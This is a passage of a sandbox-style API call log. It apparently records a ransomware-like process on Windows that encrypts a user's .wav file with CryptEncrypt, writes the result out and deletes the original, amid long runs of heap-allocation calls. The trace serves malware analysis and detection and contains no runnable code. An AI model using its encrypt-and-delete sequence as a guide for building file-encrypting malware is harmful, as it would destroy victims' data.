[0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0113.363] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0113.363] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0113.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0113.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca958, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.365] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x14149, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x14150) returned 1 [0113.365] CharLowerBuffW (in: lpsz="byte[82257]", cchLength=0xb | out: lpsz="byte[82257]") returned 0xb [0113.367] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.367] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.368] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ae160*, pdwDataLen=0x144e538*=0x14149, dwBufLen=0x14150 | out: pbData=0x49ae160*, pdwDataLen=0x144e538*=0x14150) returned 1 [0113.368] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.368] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.370] WriteFile (in: hFile=0x298, lpBuffer=0x452a168*, nNumberOfBytesToWrite=0x14150, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x452a168*, lpNumberOfBytesWritten=0x144ef3c*=0x14150, lpOverlapped=0x0) returned 1 [0113.372] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0113.372] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0113.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0113.373] CryptDestroyKey (hKey=0x41ac280) returned 1 [0113.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.373] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0113.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0113.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0113.373] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0113.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0113.373] FreeLibrary (hLibModule=0x756e0000) returned 1 [0113.373] CloseHandle (hObject=0x258) returned 1 [0113.373] CloseHandle (hObject=0x298) returned 1 [0113.381] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav", lpFilePart=0x0) returned 0x38 [0113.381] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\_ldkw-l4k_dtcajqt1.wav")) returned 0x20 [0113.381] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6269c470, ftCreationTime.dwHighDateTime=0x1d5e1fa, ftLastAccessTime.dwLowDateTime=0x6f35fe70, ftLastAccessTime.dwHighDateTime=0x1d5e868, ftLastWriteTime.dwLowDateTime=0x6f35fe70, ftLastWriteTime.dwHighDateTime=0x1d5e868, nFileSizeHigh=0x0, nFileSizeLow=0x14149, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="_lDKW-L4K_DTCAjQT1.wav", cAlternateFileName="_LDKW-~1.WAV")) returned 0x41ac780 [0113.381] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\_lDKW-L4K_DTCAjQT1.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\_ldkw-l4k_dtcajqt1.wav")) returned 1 [0113.435] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6269c470, ftCreationTime.dwHighDateTime=0x1d5e1fa, ftLastAccessTime.dwLowDateTime=0x6f35fe70, ftLastAccessTime.dwHighDateTime=0x1d5e868, ftLastWriteTime.dwLowDateTime=0x6f35fe70, ftLastWriteTime.dwHighDateTime=0x1d5e868, nFileSizeHigh=0x0, nFileSizeLow=0x14149, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="_lDKW-L4K_DTCAjQT1.wav", cAlternateFileName="_LDKW-~1.WAV")) returned 0 [0113.436] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0113.436] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0113.437] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314d10 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0113.437] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0113.437] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0113.437] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0113.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0113.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0113.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0113.437] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0113.437] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2430 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0113.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0113.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0113.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f68 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0113.438] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0113.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0113.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0113.439] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0113.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0113.439] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0113.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0113.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0113.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0113.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0113.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0113.501] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0113.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0113.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x44) returned 0x428b4e8 [0113.502] RtlAllocateHeap (HeapHandle=0x1780000, 